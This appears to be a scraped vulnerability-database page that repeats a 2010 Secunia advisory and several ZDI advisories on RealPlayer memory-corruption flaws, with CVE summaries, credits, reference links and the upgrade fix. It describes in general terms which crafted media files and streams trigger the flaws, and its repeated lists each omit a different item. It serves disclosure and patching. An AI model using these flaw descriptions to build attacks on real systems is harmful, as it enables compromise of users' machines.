http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ZDI-10-273: RealNetworks RealPlayer AAC MLLT Atom Parsing Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-273
December 10, 2010
-- CVE ID:
CVE-2010-2999
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8415.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-08-20 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
| VAR-201012-0319 | CVE-2010-2997 | RealNetworks RealPlayer Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Use-after-free vulnerability in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.0.1, Mac RealPlayer 11.0 through 11.1, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted StreamTitle tag in an ICY SHOUTcast stream, related to the SMIL file format. User interaction is required to exploit this vulnerability in that the target must open a malicious SHOUTcast Stream.The specific flaw exists in the processing of the StreamTitle tag in a SHOUTcast stream using the ICY protocol. A specially crafted string supplied as the property for the title can result in a failed allocation of heap memory. This then causes the freeing of critical pointers that are subsequently used after freeing. Successful exploitation of this vulnerability can lead to system compromise under the credentials of the currently logged in user.
Real Networks released an advisory regarding 27 security vulnerabilities in RealPlayer. Real Networks RealPlayer is prone to heap corruption vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Windows RealPlayer SP 1.0.1 and prior, Mac RealPlayer 11.1.0.1116 and prior, Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ZDI-10-270: RealNetworks RealPlayer ICY Protocol StreamTitle Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-270
December 10, 2010
-- CVE ID:
CVE-2010-2997
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8344.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-06-25 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
| VAR-201012-0254 | CVE-2010-4377 | RealNetworks RealPlayer of Cook Audio Codec Heap-based buffer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.5, Mac RealPlayer 11.0 through 12.0.0.1444, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code by specifying many subbands in cook audio codec information in a Real Audio file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious media file.The specific flaw exists in the parsing of audio codec information encapsulated in a Real Audio media file. By specifying a large number of subbands an allocated heap chunk can be overflown. Successful exploitation can result in system compromise under the credentials of the currently logged in user.
Real Networks released an advisory regarding 27 security vulnerabilities in RealPlayer. Real Networks RealPlayer is prone to a heap overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Windows RealPlayer SP 1.1.5 and prior, Mac RealPlayer 12.0.0.1444 and prior, Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ZDI-10-272: RealNetworks RealPlayer Cook Audio Codec Parsing Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-272
December 10, 2010
-- CVE ID:
CVE-2010-4377
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8454.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-06-25 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
| VAR-201012-0253 | CVE-2010-4376 | RealNetworks RealPlayer of RTSP GIF Heap-based buffer overflow vulnerability in the parsing process |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
